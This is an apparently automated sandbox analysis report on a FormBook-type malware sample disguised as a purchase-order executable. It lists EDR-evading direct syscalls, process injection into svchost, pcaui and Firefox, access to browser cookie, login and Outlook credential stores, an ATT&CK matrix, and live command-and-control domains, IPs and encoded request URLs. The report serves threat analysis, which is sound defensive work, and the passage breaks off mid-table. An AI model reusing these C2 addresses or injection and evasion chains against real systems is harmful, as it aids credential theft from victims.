                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe protection: read write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\pcaui.exe | Thread register set: target process: 2284
                Source: C:\Windows\SysWOW64\pcaui.exe | Thread APC queued: target process: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 26F9008
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0041B106 LogonUserW
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_003E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0042411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_004274E7 mouse_event
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #2411071822.exe"
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                Source: C:\Windows\SysWOW64\pcaui.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0041A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_004271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: PO #2411071822.exe, olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: PO #2411071822.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: olMdMEBIcgVB.exe, 00000003.00000002.3891741842.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000000.2076923243.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891885830.0000000001651000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_004065C4 cpuid
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0043091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0045B340 GetUserNameW
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00411E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_003FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\pcaui.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\pcaui.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: PO #2411071822.exe | Binary or memory string: WIN_81
                Source: PO #2411071822.exe | Binary or memory string: WIN_XP
                Source: PO #2411071822.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: PO #2411071822.exe | Binary or memory string: WIN_XPe
                Source: PO #2411071822.exe | Binary or memory string: WIN_VISTA
                Source: PO #2411071822.exe | Binary or memory string: WIN_7
                Source: PO #2411071822.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00438C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0043923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
ATT&CK matrix (one tactic column per line, cells listed top to bottom; a leading number marks a technique with matching signatures)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1560695 | Sample: PO #2411071822.exe | Startdate: 22/11/2024 | Architecture: WINDOWS | Score: 100

Start
  Contacts: www.rtpterbaruwaktu3.xyz; www.54248711.xyz; 12 other IPs or domains
  Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
  www.54248711.xyz: Performs DNS queries to domains with low reputation
  PO #2411071822.exe (started)
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    svchost.exe (started)
      Signatures: Maps a DLL or memory area into another process
      olMdMEBIcgVB.exe (injected)
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        pcaui.exe (started)
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          olMdMEBIcgVB.exe (injected)
            Contacts: rtpterbaruwaktu3.xyz 103.21.221.87, ports 49726, 80, LINKNET-ID-APLinknetASNID, unknown; www.54248711.xyz 161.97.142.144, ports 50014, 50015, 80, CONTABODE, United States; 9 other IPs or domains
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          firefox.exe (started)

Source | Detection | Scanner | Label
PO #2411071822.exe | 37% | ReversingLabs | Win32.Trojan.AutoitInject
PO #2411071822.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
www.mrpokrovskii.pro | 1% | Virustotal |
                SourceDetectionScannerLabelLink
                http://www.llljjjiii.shop/rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.smartcongress.net/11t3/0%Avira URL Cloudsafe
                http://www.70kdd.top/klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/2pji/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw0%Avira URL Cloudsafe
                http://www.gogawithme.live/6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag==0%Avira URL Cloudsafe
                http://www.70kdd.top/klhq/0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==100%Avira URL Cloudmalware
                http://www.ampsamkok88.shop/huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx0%Avira URL Cloudsafe
                http://www.54248711.xyz0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/w9z4/100%Avira URL Cloudmalware
                http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEh0%Avira URL Cloudsafe
                http://www.llljjjiii.shop/rsvy/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S0%Avira URL Cloudsafe
                http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns0%Avira URL Cloudsafe
                http://www.gogawithme.live/6gtt/0%Avira URL Cloudsafe
                http://www.ytsd88.top/egqi/0%Avira URL Cloudsafe
                http://www.ytsd88.top/egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuX0%Avira URL Cloudsafe
                http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WE0%Avira URL Cloudsafe
                http://www.ampsamkok88.shop/huvt/0%Avira URL Cloudsafe
                http://www.Matteicapital.online0%Avira URL Cloudsafe
                http://www.54248711.xyz/jm2l/0%Avira URL Cloudsafe
                http://www.matteicapital.online/hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA==0%Avira URL Cloudsafe
                http://www.matteicapital.online/hyyd/0%Avira URL Cloudsafe
                http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.llljjjiii.shop
                8.210.114.150
                truefalse
                  unknown
                  www.ampsamkok88.shop
                  172.67.209.48
                  truefalse
                    unknown
                    www.acond-22-mvr.click
                    199.59.243.227
                    truefalse
                      unknown
                      www.mrpokrovskii.pro
                      194.85.61.76
                      truefalseunknown
                      smartcongress.net
                      146.88.233.115
                      truefalse
                        unknown
                        www.matteicapital.online
                        208.91.197.27
                        truefalse
                          unknown
                          70kdd.top
                          38.47.232.124
                          truefalse
                            unknown
                            www.54248711.xyz
                            161.97.142.144
                            truetrue
                              unknown
                              www.ytsd88.top
                              47.76.213.197
                              truefalse
                                unknown
                                www.gogawithme.live
                                209.74.77.109
                                truefalse
                                  unknown
                                  rtpterbaruwaktu3.xyz
                                  103.21.221.87
                                  truetrue
                                    unknown
                                    www.70kdd.top
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.rtpterbaruwaktu3.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.smartcongress.net
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.rtpterbaruwaktu3.xyz/7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag==false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.llljjjiii.shop/rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuXfalse
                                          • Avira URL Cloud: safe
                                          unknown
